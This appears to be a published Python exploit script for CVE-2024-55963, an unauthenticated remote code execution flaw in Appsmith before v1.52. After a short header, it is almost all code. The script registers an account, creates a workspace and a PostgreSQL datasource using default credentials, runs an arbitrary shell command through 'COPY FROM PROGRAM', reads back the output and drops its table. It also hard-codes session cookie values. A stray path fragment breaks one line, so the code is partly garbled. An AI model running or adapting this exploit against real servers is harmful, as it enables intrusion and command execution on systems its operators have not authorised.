# Exploit Title: AppSmith 1.47 - Remote Code Execution (RCE) # Original Author: Rhino Security Labs # Exploit Author: Nishanth Anand # Exploit Date: April 2, 2025 # Vendor Homepage: https://www.appsmith.com/ # Software Link: https://github.com/appsmithorg/appsmith # Version: Prior to v1.52 # Tested Versions: v1.47 # CVE ID: CVE-2024-55963 # Vulnerability Type: Remote Code Execution # Description: Unauthenticated remote code execution in Appsmith versions prior to v1.52 due to misconfigured PostgreSQL database allowing COPY FROM PROGRAM command execution. # Proof of Concept: Yes # Categories: Web Application, Remote Code Execution, Database # CVSS Score: 9.8 (Critical) # CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H # Notes: The vulnerability exists in Appsmith's internal PostgreSQL database configuration, allowing attackers to execute arbitrary commands on the host system. import requests import json import pyfiglet import argparse # Create a banner using pyfiglet banner = pyfiglet.figlet_format("Appsmith RCE") # Replace with your desired title print(banner) # Set up argument parser parser = argparse.ArgumentParser(description='Appsmith RCE Proof of Concept') parser.add_argument('-u', '--url', required=True, help='Base URL of the target') parser.add_argument('command', nargs='?', default='id', help='Command to execute') args = parser.parse_args() # Get the base URL and command from the parsed arguments base_url = args.url command_arg = args.command if not base_url.startswith("http://") and not base_url.startswith("https://"): base_url = "http://" + base_url # Signup request signup_url = f"{base_url}/api/v1/users" signup_data = { "email": "poc1@poc.com", "password": "Testing123!" } print('Signing up...') signup_response = requests.post(signup_url, data=signup_data) signup_response.raise_for_status() # Login request login_url = f"{base_url}/api/v1/login" # Adjust the URL as needed login_headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": base_url, "Connection": "keep-alive", "Referer": f"{base_url}/user/login", "Cookie": "ajs_user_id=e471142002a6163a3beff6ee71606ea55d631c49e566f403b0614af905ae951d; intercom-device-id-y10e7138=83f9c6a5-3c0b-409e-9d7b-9ca61a129f49; SESSION=1e786474-3b33-407d-be71-47d986031a24; ajs_anonymous_id=8e91142e-ea5a-4725-91b6-439e8bd0abc1; intercom-session-y10e7138=bHI4SnhSRFhmUUVLUXpGZ0V0R0lzUkZsSmxEQkFJKzRaV20wMGtnaGtJWjJoc1AySWV6Rnl2c1AvbUY4eEkxaC0tK1pqNHNKYlZxVzBib1F3NVhXK0poQT09--0daa2198fe17122d3291b90abdb3e78d193ad2ed", } login_data = { "username": "poc1@poc.com", # Adjusted to match the provided request "password": "Testing123!" } # Make the login request without following redirects print('Logging in...') login_response = requests.post(login_url, headers=login_headers, data=login_data, allow_redirects=False) login_response.raise_for_status() # Capture the 'Set-Cookie' header if it exists set_cookie = login_response.headers.get('Set-Cookie') if set_cookie: # Split the Set-Cookie header to get the cookie name and value cookie_name, cookie_value = set_cookie.split(';')[0].split('=') # Fourth request to create a new workspace print('Creating a new workspace...') if set_cookie: fourth_request_url = f"{base_url}/api/v1/workspaces" fourth_request_headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json", "X-Requested-By": "Appsmith", "Connection": "keep-alive", "Referer": f"{base_url}/applications", "Cookie": f"{cookie_name}={cookie_value}", # Use the captured session cookie } fourth_request_data = json.dumps({"name": "Untitled workspace 3"}) fourth_response = requests.post(fourth_request_url, headers=fourth_request_headers, data=fourth_request_data) fourth_response.raise_for_status() # Extract the 'id' from the response if it exists try: response_json = fourth_response.json() workspace_id = response_json.get("data", {}).get("id") except ValueError: print("Response content is not valid JSON:", fourth_response.text) # Print the raw response for debugging if workspace_id: fifth_request_url = f"{base_url}/api/v1/applications" fifth_request_headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json", "X-Requested-By": "Appsmith", "Content-Length": "161", "Origin": base_url, "Connection": "keep-alive", "Referer": f"{base_url}/applications?workspaceId={workspace_id}", "Cookie": f"{cookie_name}={cookie_value}", } fifth_request_data = json.dumps({"workspaceId":workspace_id,"name":"Untitled application 2","color":"#E3DEFF","icon":"chinese-remnibi","positioningType":"FIXED","showNavbar":None}) print('Creating a new application...') fifth_response = requests.post(fifth_request_url, headers=fifth_request_headers, data=fifth_request_data) fifth_response.raise_for_status() try: response_json = fifth_response.json() application_id = response_json.get("data", {}).get("id") except ValueError: print("Response content is not valid JSON:", fifth_response.text) # Sixth request to get workspace details if workspace_id: sixth_request_url = f"{base_url}/api/v1/workspaces/{workspace_id}" sixth_request_headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "x-anonymous-user-id": "8e91142e-ea5a-4725-91b6-439e8bd0abc1", "Connection": "keep-alive", "Referer": f"{base_url}/app/untitled-application-2/page1-67294f8c2f2a476b7cdc6e20/edit", "Cookie": f"{cookie_name}={cookie_value}", } print('Getting workspace details...') sixth_response = requests.get(sixth_request_url, headers=sixth_request_headers) sixth_response.raise_for_status() # Extract all plugin IDs from the response try: response_json = sixth_response.json() plugin_ids = [plugin.get("pluginId") for plugin in response_json.get("data", {}).get("plugins", [])] # Loop through each plugin ID for the seventh request print(f'Searching for vulnerable postgres database...') for plugin_id in plugin_ids: # Seventh request to get the form data for the plugin seventh_request_url = f"{base_url}/api/v1/plugins/{plugin_id}/form" seventh_request_headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "x-anonymous-user-id": "8e91142e-ea5a-4725-91b6-439e8bd0abc1", "Connection": "keep-alive", "Referer": f"{base_url}/app/untitled-application-2/page1-67294f8c2f2a476b7cdc6e20/edit/datasources/NEW", "Cookie": f"{cookie_name}={cookie_value}", } try: seventh_response = requests.get(seventh_request_url, headers=seventh_request_headers) seventh_response.raise_for_status() # Extracting the port value from the seventh response try: seventh_response_json = seventh_response.json() if 'data' in seventh_response_json and 'form' in seventh_response_json['data']: form_data = seventh_response_json['data']['form'] if any("postgres" in str(item) for item in form_data): print(f"Vulnerable postgres database found.") break else: pass except (ValueError, IndexError) as e: pass except requests.exceptions.HTTPError as e: print(f"Error checking plugin {plugin_id}: {e}") continue # Proceed to request 8 after finding "postgres" # Proceed to request 8 after finding "postgres" if "postgres" in str(seventh_response_json): try: # Try the environments API endpoint eighth_request_url = f"{base_url}/api/v1/environments/workspaces/{workspace_id}?fetchDatasourceMeta=true" eighth_request_headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "x-anonymous-user-id": "8e91142e-ea5a-4725-91b6-439e8bd0abc1", "Connection": "keep-alive", "Referer": f"{base_url}/app/untitled-application-2/page1-67294f8c2f2a476b7cdc6e20/edit", "Cookie": f"{cookie_name}={cookie_value}", } print('Getting the workspace details...') eighth_response = requests.get(eighth_request_url, headers=eighth_request_headers) eighth_response.raise_for_status() # Extracting the workspace ID from the eighth response try: eighth_response_json = eighth_response.json() workspace_data = eighth_response_json.get("data", [{}])[0] workspace_id_value = workspace_data.get("id") except (ValueError, IndexError): print("Response content is not valid JSON or does not contain the expected structure:", eighth_response.text) except requests.exceptions.HTTPError as e: # If the environments API fails, use the workspace ID we already have print(f"Could not fetch environment details: {e}") print("Using existing workspace ID for datasource creation...") workspace_id_value = workspace_id except (ValueError, IndexError): print("Response content is not valid JSON or does not contain enough plugins:", sixth_response.text) # After the eighth request to get workspace details if workspace_id_value: ninth_request_url = f"{base_url}/api/v1/datasources" ninth_request_headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json", "X-Requested-By": "Appsmith", "x-anonymous-user-id": "8e91142e-ea5a-4725-91b6-439e8bd0abc1", "Origin": base_url, "Connection": "keep-alive", "Referer": f"{base_url}/app/untitled-application-2/page1-67294f8c2f2a476b7cdc6e20/edit/datasource/temp-id-0?from=datasources&pluginId=671a669f4e7fe242d9885195", "Cookie": f"{cookie_name}={cookie_value}", } ninth_request_data = { "pluginId": plugin_id, "datasourceStorages": { workspace_id_value: { "datasourceConfiguration": { "properties": [None, {"key": "Connection method", "value": "STANDARD"}], "connection": { "mode": "READ_WRITE", "ssl": {"authType": "DEFAULT"} }, "endpoints": [{"port": "5432", "host": "localhost"}], "sshProxy": {"endpoints": [{"port": "22"}]}, "authentication": { "databaseName": "postgres", "username": "postgres", "password": "postgres" } }, "datasourceId": "", "environmentId": workspace_id_value, "isConfigured": True } }, "name": "Untitled datasource 1", "workspaceId": workspace_id } print('Connecting to vulnerable postgres database...') ninth_response = requests.post(ninth_request_url, headers=ninth_request_headers, json=ninth_request_data) ninth_response.raise_for_status() # Extracting the ID from the response try: ninth_response_json = ninth_response.json() datasource_id = ninth_response_json.get("data", {}).get("id") except (ValueError, KeyError): print("Response content is not valid JSON or does not contain the expected structure:", ninth_response.text) # After the ninth request to create the datasource if datasource_id: # 10th Request tenth_request_url = f"{base_url}/api/v1/datasources/{datasource_id}/schema-preview" tenth_request_headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json", "X-Requested-By": "Appsmith", "x-anonymous-user-id": "017a0261-6296-4852-88a1-d557bd478fb2", "Origin": base_url, "Connection": "keep-alive", "Referer": f"{base_url}/app/untitled-application-1/page1-670056b59e810d6d78f0f7dc/edit/datasource/67005e8f9e810d6d78f0f7e3", "Cookie": f"{cookie_name}={cookie_value}", } tenth_request_data = { "title": "SELECT", "body": "create table poc (column1 TEXT);", "suggested": True } print("Creating the table 'poc'...") tenth_response = requests.post(tenth_request_url, headers=tenth_request_headers, json=tenth_request_data) tenth_response.raise_for_status() # 11th Request eleventh_request_url = f"{base_url}/api/v1/datasources/{datasource_id}/schema-preview" eleventh_request_headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json", "X-Requested-By": "Appsmith", "x-anonymous-user-id": "017a0261-6296-4852-88a1-d557bd478fb2", "Origin": base_url, "Connection": "keep-alive", "Referer": f"{base_url}/app/untitled-application-1/page1-670056b59e810d6d78f0f7dc/edit/datasource/67005e8f9e810d6d78f0f7e3", "Cookie": f"{cookie_name}={cookie_value}", } eleventh_request_data = { "title": "SELECT", "body": f"copy poc from program '{command_arg}';", "suggested": True }/CVE-2024-55963-Appsmith-RCE print("Running command...") eleventh_response = requests.post(eleventh_request_url, headers=eleventh_request_headers, json=eleventh_request_data) eleventh_response.raise_for_status() # 12th Request twelfth_request_url = f"{base_url}/api/v1/datasources/{datasource_id}/schema-preview" # Use the datasource_id twelfth_request_headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json", "X-Requested-By": "Appsmith", "x-anonymous-user-id": "017a0261-6296-4852-88a1-d557bd478fb2", # Use your actual anonymous user ID "Origin": base_url, "Connection": "keep-alive", "Referer": f"{base_url}/app/untitled-application-1/page1-670056b59e810d6d78f0f7dc/edit/datasource/67005e8f9e810d6d78f0f7e3", "Cookie": f"{cookie_name}={cookie_value}", # Use the captured session cookie } # Request body for the 12th schema preview twelfth_request_data = { "title": "SELECT", "body": "select * from poc;", "suggested": True } # Print statement before the 12th request print("Reading command output from poc table...\n") # Make the POST request for the 12th schema preview twelfth_response = requests.post(twelfth_request_url, headers=twelfth_request_headers, json=twelfth_request_data) # Extracting and printing the response from the 12th schema preview try: twelfth_response_json = twelfth_response.json() # Extracting the specific data body_data = twelfth_response_json.get("data", {}).get("body", []) column1_values = [item.get("column1") for item in body_data] # Extract only the column1 values print("Command output:") print("----------------------------------------") for value in column1_values: print(value) # Print each column1 value print("----------------------------------------\n") except (ValueError, KeyError): print("Response content is not valid JSON or does not contain the expected structure:", twelfth_response.text) # Print the raw response for debugging # Cleanup Request cleanup_request_url = f"{base_url}/api/v1/datasources/{datasource_id}/schema-preview" # Use the datasource_id cleanup_request_headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json", "X-Requested-By": "Appsmith", "x-anonymous-user-id": "017a0261-6296-4852-88a1-d557bd478fb2", # Use your actual anonymous user ID "Origin": base_url, "Connection": "keep-alive", "Referer": f"{base_url}/app/untitled-application-1/page1-670056b59e810d6d78f0f7dc/edit/datasource/67005e8f9e810d6d78f0f7e3", "Cookie": f"{cookie_name}={cookie_value}", # Use the captured session cookie } # Request body for cleanup cleanup_request_data = { "title": "SELECT", "body": "DROP TABLE poc;", # Command to drop the table "suggested": True } # Make the POST request for the cleanup print('\nDropping the table...') cleanup_response = requests.post(cleanup_request_url, headers=cleanup_request_headers, json=cleanup_request_data)